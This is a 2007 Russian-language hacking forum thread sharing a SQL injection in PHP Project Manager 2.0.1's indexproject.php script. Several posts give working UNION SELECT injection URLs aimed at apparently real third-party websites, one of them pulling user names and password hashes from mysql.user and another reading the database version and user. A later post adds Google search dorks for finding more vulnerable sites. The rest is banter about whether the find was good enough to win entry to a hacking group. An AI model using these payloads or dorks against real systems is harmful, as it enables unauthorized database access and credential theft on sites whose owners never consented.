sql inj PHP Project Manager => 2.0.1

Discussion in 'Уязвимости' started by BlackCats, 23 Mar 2007.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.

    PHP Project Manager
    версия => 2.0.1
    описание:
    Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
    пример:
    Code:
    http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*
    
    на секлабе баги нету(ну и вроде в др местах тоже)
     
    2 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    хэк=)
     
  3. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
    :)
     
  4. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    и это все??? нда, коварно..
    я думал ты хоть подобрал названия таблиц..
     
  5. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    зачем? я же просто привёл пример.. и только-то..
     
  6. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    мде =\
    Code:
    http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
    это в sqlz можно..
    :)
     
    #6 n1†R0x, 23 Mar 2007
    Last edited: 24 Mar 2007
    1 person likes this.
  7. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
     
  8. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    порой самописные сайты бывают лучше защищены, чем средние Cms.
    я понял твою мысль..
     
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ну вот и хорошо :)
    следующий..
     
    1 person likes this.
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    я ;)

    Строка для поиска в гугл: inurl:indexproject.php?id

    Мдя, не густо:
    Code:
    http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
    
    и так тоже:
    Code:
    http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
    
    Ну да, скуль есть:
    Code:
    http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
    тока двиг не популярный...
     
    #10 -=lebed=-, 25 Mar 2007
    Last edited: 25 Mar 2007
  11. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    :)))))))))
    *с надеждой в голосе*
    ну может это только пока... а потом скрипт станет мега популярным...
     
  12. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    тема переростает во флейм и она себя исчерпала.
     
    1 person likes this.
  13. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    ммм если ты даешь пример sql то для этого есть тема, если ты даешь уязвимость в движке ты пишешь как и при каких условиях поднять права.
     
    3 people like this.
  14. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    нет, причём тут поднятие прав? на секлабе вродебы ничего про это нет...
     
  15. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    \6/, для тебя секлаб - самая высшая инстанция и авторитет??? Тогда мне тебя жаль..
     
    #15 Rebz, 25 Mar 2007
    Last edited: 25 Mar 2007
    1 person likes this.
  16. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ну я больше незна столь популярных багтреков